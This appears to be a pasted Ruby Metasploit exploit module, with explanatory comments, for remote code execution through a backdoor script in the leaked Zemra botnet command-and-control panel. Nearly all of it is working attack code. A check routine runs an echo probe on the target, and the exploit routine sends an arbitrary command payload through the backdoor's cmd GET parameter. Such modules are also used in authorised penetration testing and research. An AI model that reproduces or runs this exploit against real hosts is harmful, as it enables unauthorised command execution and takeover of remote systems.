
[Ruby] Zemra-Botnet_RCE

Feb 1st, 2017
  1. # Zemra Botnet CnC Web Panel Remote Code Execution
  2.  
  3. require 'msf/core'
  4.  
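class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata.
  #
  # The "vulnerability" is a hard-coded backdoor script (system/command.php)
  # shipped inside the leaked Zemra panel source: it runs whatever arrives in
  # the `cmd` GET parameter. The payload is therefore a plain command string
  # (ARCH_CMD) and not a binary stager, and it is sent unmodified.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Zemra Botnet CnC Web Panel Remote Code Execution',
      'Description'    => %q{
        This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
        inside its leaked source code. Zemra is a crimeware bot that can be used to
        conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chris Poole <@codingplanets>'
        ],
      'References'     =>
        [
          ['URL', 'http://twitter.com/codingplanets'],
          ['URL', 'http://github.com/codingplanets'], #leaked source code and backdoor intro
          ['URL', 'http://pastebin.com/u/1337ings']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 10000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['zemra panel / Unix', { 'Platform' => 'unix' } ],
          ['zemra panel / Windows', { 'Platform' => 'win' } ]
        ],
      # Framework (msftidy) expects "Mon DD YYYY"; the original '2/2/17' is
      # not a format it accepts.
      'DisclosureDate' => 'Feb 02 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
      ],self.class)
  end

  # Probe the backdoor without running the real payload.
  #
  # Fixes two defects in the original check: it read a local `res` that was
  # never assigned (the request's return value was discarded), and it only
  # looked for the literal string "cmd" anywhere in the body, which matches
  # any page that merely mentions the parameter name. Instead we echo a random
  # marker and require it to come back -- only a host that actually executed
  # the command can return it. `echo` exists in both sh and cmd.exe, so the
  # probe works for either target.
  #
  # NOTE: even the check is intrusive: it executes a (harmless) command on the
  # remote host. Run it only against systems you are authorised to test.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable, Safe, or Unknown when no
  #   HTTP response was obtained
  def check
    marker = Rex::Text.rand_text_alpha(8)
    res = send_command_request("echo #{marker}")
    # A check must not abort the module via fail_with; report Unknown instead.
    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Vulnerable if res.code == 200 && res.body.include?(marker)
    Exploit::CheckCode::Safe
  end

  # Send a command to the backdoor and insist on an HTTP 200.
  #
  # @param cmd [String] shell command to run on the target
  # @return [Rex::Proto::Http::Response] the response (status 200)
  # @raise via fail_with(Failure::Unknown) when there is no response or the
  #   status is not 200 -- this is the exploit-path behaviour, kept unchanged
  def http_send_command(cmd)
    res = send_command_request(cmd)
    unless res && res.code == 200
      fail_with(Failure::Unknown, 'Failed to execute the command.')
    end
    res
  end

  # Deliver the encoded cmd payload through the backdoor. send_request_cgi
  # URL-encodes `vars_get`, so the payload needs no extra escaping here.
  def exploit
    http_send_command(payload.encoded)
  end

  private

  # Issue GET <TARGETURI>?cmd=<cmd> and return the raw response (nil on
  # connection failure). Shared by check and http_send_command so the two
  # never drift apart in how they reach the backdoor.
  #
  # @param cmd [String] command to place in the `cmd` query parameter
  # @return [Rex::Proto::Http::Response, nil]
  def send_command_request(cmd)
    uri = normalize_uri(target_uri.path.to_s)
    send_request_cgi({
      'method'  => 'GET',
      'uri'             => uri,
      'vars_get'        =>
        {
          'cmd' => cmd
        }
    })
  end
end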